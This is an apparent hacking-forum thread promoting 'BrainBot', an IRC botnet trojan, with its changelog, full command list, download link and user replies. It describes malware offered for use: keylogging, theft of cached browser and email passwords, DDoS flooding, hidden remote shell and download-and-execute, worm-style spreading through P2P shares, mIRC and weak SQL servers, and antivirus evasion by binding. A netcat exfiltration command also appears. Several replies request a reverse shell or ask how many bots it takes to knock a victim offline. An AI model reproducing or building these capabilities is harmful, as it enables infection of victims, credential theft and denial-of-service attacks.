Hi ,

I coded a IRC - bot with several features.

===========
Changes in update to 1.5.3::

-added !uptime
-added !flood (floods ports http requests)
-added !socks on/off (starts a socks 4 on 1080) (by alch -> THX)

-fixed some bugs in connection procedure
===========

===========
I'm not responsible for anything you do with this.
It's not ment and coded for using it in real life practice.
ITS YOUR FAULT, if u use this for any illegal purpose
===========


===========
Changes in update to 1.5::


-p2p Spreader added
-Mirc.ini manipulator-spreader
-IRC spam spreader
-bind file to server function(By flowby -> THX)
-Change Icon function(THX to flowby)

p2p Spreader:
spreads by copying itself to the shared folders of following p2p programs:
kazaa,klite,LimeWire,bearshare,Morpheus,Grokster

Mirc.ini manipulator-spreader:
Manipulates mirc installation in a way so it will send a msg and afterwards the bots
executable to all users in all channels the victim joins.(sends exe via dcc)

IRC spam spreader:
You can chose 5 irc networks and 20 different channels on these nets in builder.
the bots will join in there and spam around your message. You may put a fakesite-URL into the msg
or just let it post a link to your ie sploit...

bind file to server function:
Lets u bind any file to the server...
btw: makes it undetected =)

Change Icon function:
You can chose an Icon for the bot executable.
===========



Here is a List of all the commands to use with BrainBot beta 1.4::
=======================
=======================
!login <PW>
The Bot only will accept Commands after u logged in with this command...
So your bots wont be took by some thiefs =).
<Pw> stands for the admin - Password you specified in the server builder- form


!logout
This will log u out so that the bot dont accepts comands anymore until u login again


!reboot
forces the infected machine to reboot =D


!shutdown
forces the infected machine to shutdown -.-^^


!info
This will show you some General Information abot the infected box=)


!leave
makes the bot leave the channel ^^


!uninstall
uninstall the bot from infected box


!serials
The bot will post some game serials if installed...
gonna add support for some more games in next version .


!floodping <IP/Host>
The bot or bots will flood the specified Host with fast permanent pings!
(such as DDoS... depends on how many bots u got =D)


!logkeyson
turns keylogger on


!logkeysoff
turns keylogger off


!showkeys
shows all the logged keys


!clearlog
will clear the keylog file


!PWS
I think this is the best feature in this bot:
the bot will post cached IE passes and Outlook express passes


!dloadfile <url> <target>
will download a file from <URL> to <target>


!execfile <location>
Executes the file in <location>


!commands
shows a list of the commands =)

!IP
shows you the current ip of infected box


!nick <Nick>
bot changes its nick to <Nick>


!free
will show free disk space of infected machine


!spam <channel>
will start spamming the specified channel


!stopspam
stops spamming

========
!scan <Parameters>
scans with the Dfind-0.8 by by class101
infos at:http://www.governmentsecurity.org/forum/http://www.governmentsecurity.org/forum/index.php?showtopic=9120

use following parameters:
Usage: !scan <Option> [THREADS]

<Option>:
-p <Port> <IP IP> .......... Scan one port on iprange
+p <Port> <IP IP> .......... Scan iprange,+logs ok,refused connections
-p <Port , Port> <IP IP> ... Scan two ports on iprange
-p <Port Port> <IP> ........ Scan a portrange on ip
+p <Port Port> <IP> ........ Scan portrange,+logs ok,refused connections
-ban <Port Port> <IP> ........ Scan portbanners on ip
-ban <Port> <IP IP> .......... Scan portbanners on iprange
-cgi <IP> .................... Scan cgi hole
+ipc <IP IP> ................. Scan IPC$ null on 139 & 445
-ipc <IP IP> ................. Scan IPC$ null on 139
-ipc2 <IP IP> ................. Scan IPC$ null on 445
-iis <IP IP> ................. Scan IIS webservers
-apa <IP IP> ................. Scan Apache webservers
-wdv <IP IP> ................. Scan WebDav on IIS5.0
-hpj <IP IP> ................. Scan HP Web JetAdmin
-msa <IP IP> ................. Scan MSADC on webservers
-ccb <IP IP> ................. Scan CCBill WhereAmi
-med <IP IP> ................. Scan WMedia on webservers
-php <IP IP> ................. Scan phpBB on webservers
-php2 <IP IP> ................. Scan PHP-Nuke on webservers
-pso <IP IP> ................. Scan PSOProxy Server
-fro <IP IP> ................. Scan frontpage host
-rea <IP IP> ................. Scan RealServer component
-htr <IP IP> ................. Scan +.htr hole
-pri <IP IP> ................. Scan .printer host
-uni <IP IP> ................. Scan unicode hole
-idq <IP IP> ................. Scan .idq host
-cod <IP IP> ................. Scan codered virus hole
-opx <IP IP> ................. Scan OptixPRO v1.0 => 1.32(include) hole
-rad <IP IP> ................. Scan Radmin 2.1 Auth,NTAuth,NULL session
-sql <IP IP> ................. Scan MS SQL Servers for weak access
-req <REQ IP IP> ............. Scan File/Dir Request on webservers

!showscan
gives you the scan results

!sendscan <Your IP> <NC Port>
The bot will connect to <Your IP> <NC Port> and echo the dfind results to it
You have to start nc with this parameters before:
nc -l -p <port> >>dfind =D

!killscan
stops the current scanningprocess.
so u can clear the scanlogs by typing !shell del dfind
==========

!cat <file>
echos any file from infected box


!raw <IRCcommand>
will execute <IRCcommand>


!shell <commands>
will execute <commands> hidden on infected host
<commands> can be any dos command + parameters

!upgrade <upgradeURL>
<upgradeURL> is the URL of the new brainbot server.
it will be downloaded and executed while the old infection is removed.
this way u can easy upgrade to another brainbot version or start using another rat/bot


!op <channel> <nick>
gives <nick> +o in <channel>
of course only if bot has op in that channel.

!deop <channel> <nick>
gives <nick> -o in <channel> (deop's him =D)
of course only if bot has op in that channel.

!msg <Nick/chan> <message>
Sends <message> to the chosen nick or chan =)


=======================
=======================


===========
Changes in update to 1.4::

-An sql spreader is included now
-personalmessage-mode is now optional

comments to sql spreader:
U have to specify a FTP server in the editor and the name of the brainbot server.
this server executable will be spread by all ur bots to other sql weak pw servers.
U can specify a network. in this network (for example 217) the bot will scan rando ranges for sql weak pws.
===========

===========
I had maany request for how to use the bot with passworded channel:

here is a howto:

before executing the bot u have to create the channel and sett the password.
for example u set channel #foo with pw: bar .

Now u only have to type "foo bar" to the nick textbox and it will join #foo with pw bar.
===========


Would be nice if u guys test it and give me some feedback =)
and remember it's a beta(!)

get it here : www.brainbuster.tk

PS: would be nice if an admin could move this to trojan & virus errata forum

very nice one m8!
i like the password thingie
gonna test it locally

thanx

there should spawn an ircbot.exe in the folder of server-builder.exe

oh lol i'm sorry ... there were a bug... i fixed it..

Great shit pal,i like this one!

automated spreadin and stuff may come up in next version

no worky on winxp pro sp1

In my WinXP SP1 Pro (Spanish) working but it has got a bug, when i type !info the bot crashes of irc because of flood:

oh.. that depends on the server and how many messages it allows in a row...
just chose a server without that hard rules for testing it....

on 69.28.183.219 6667 the bots never get kicked due to flood... may go there 4 trying out the features

and ill ... what kinda error do ya get?

I'll add a function in next version to avoid flood kicks!

brainbuster just code in that the bot sends only 513 bytes and then the next 513 bytes so the result is no Excess Flood

Updated it again and nothing gets kicked anymore
hf!

works good,good job m8
ps-maybe next version you can make !nick command,so the nick of the bot can be changed...

great works! Can you add an !ip command which gives me the actual ip-address of the bot?

added those 2 commands

now the builder doesn't work for some reason...gives me error :|

can u check that plz?

greetz

What kinda error do you get.. works fine for me...

error like this :

windows error :

Brainbot - server builder

system error &H8007007E (-2147024770)

weird thing...

on my local machine it works perfect!
Can you add !free for listing the free space of all drives? Also an !uptime command for the server uptime would be good.

Where can I get the next version ?

i updated the old link with the changes i made untill now

added following commands

no source? =(

their seems to be errors..if you extract it inside a directory..you have to extract it in the main...example:

extract it in c:\> it will work..

but if you place it inside a dir in c: it wont..


and also, what servers do you use..

tried it on undernet, it didnt came up..

thank you

i tryed it with a few servers... it always worked
but maybe the server dont allows 2 different logins by the same IP..
just try it on a vic or somethin.... cuz it should work with every server.

i ahev mcafee firewall and AV...of course it detetec the bot..so i disbaled it the AV and FW..i alos closed the entire mcafee security center..

i ran the bot..i see it in netstat connection to the server..

two ports connected on 6667..one is mine (different server but the same network (undernet)) and the other i 'assume' belongs to the bot (another server but the same network (undernet))

both connections have 'established' under the state column so i pressumed the bot is connected since i am connected too..

but the problem is..the bot isnt in the channel where i want it to b..

im sure undernet aloows clones..tried it ..(i openend another client w/ different nick it got connected)

any idea what went wrong?

tnx

now i tryed on quebec.qu.ca.undernet.org port 6667
it worked nice

did u type the channel with a # in the editor?
u have to type only the channel without #

#edit
at my second try it didn't join at first... i reconnected in mirc and then it was there
#/edit

hehehehhehe..sometimes i amazed myself..i forgot that one..
man this is so embarassing..sorry about that one dude..its 5:27AM here and i was online the whole night..my brain must be in overheat...heheheheh...

thanks..

hehehehehehe..

ok its up..

!floodping <IP/Host>
The bot or bots will flood the specified Host with fast permanent pings!
(such as DDoS... depends on how many bots u got =D)

apporx. how many bots does it need to knock down a 56k dial up?

hadn't chance to test it....
i gues 4-10 bots 4 a 64k....
i just know it really pings as hell^^

Is what there is another version to install this club-footed on a stro, because this one is usable for a room.

that's like a nice irc-bot

tnx for the bot but if u can add scaninig option it will be great (hacking is beter but scaning is nice 2)

globey.

Very Nice Bot! I cant wait till an auto spread feature is added also any chance on seeing the source?

Nice Bot mate but can you add the command !raw <command> which would allow the user to do raw irc commands like JOIN PART PRIVMSG. that function in the bot would be greatly appreciated other than that keep up the good work bot master ;P

nice that u guys like it
I will see wether i find time workin on it...but i think i will..

Great bot !!!

It would be even gr8r if you add a !shell command which would execute dos commmands ie shell anything in hidden mode with arguments.

a !cat command which would display contents of ASCII files.

a !connect command which would open a connection to the host n port specified and provide a reverse shell. This would give faster connection n we can also use it if the vic is on a LAN.

and if u include a auto spread function in the next ver please make it optional in the server.

can you add a function 4 a password protected channel ?

thx for the update wont let me start the server builder now

aside from the irc rax commands,can you add a simple irc flood command..let say..msg flood or dcc..something like that..when bots talk/advertises/floods at the same time on a nick or channel..bwaheheheheheh..

tnx

eeewwww..... visual basic...... ;(

can you port this to c/c++ ? or at least, post the irc protocol function sources to
the forum? also, why is this detected by A.V.? is it not new code? (e.g. you ripped
the code from somewhere.....)

also, i'd like to try it out, but #1 rule: don't execute closed-source blackhat trojans
unless your doing it in a virtual machine (and mine died last week...)

i'd love to see source for this one, thanx for posting ;)

yeaahh this very nice, i wanna check the source for try understand some thing

sound great !!

Great Bot! Thx very much!!

the bot isnt detected by vet update version 8425, but i will ask this question again thou before u make another update on the bot add the !raw command believe me it will give the bot its weight in gold. alot of good trojans created end up being crappy because of less irc functionality. i hope to see it in the next version if not i guess ill post here again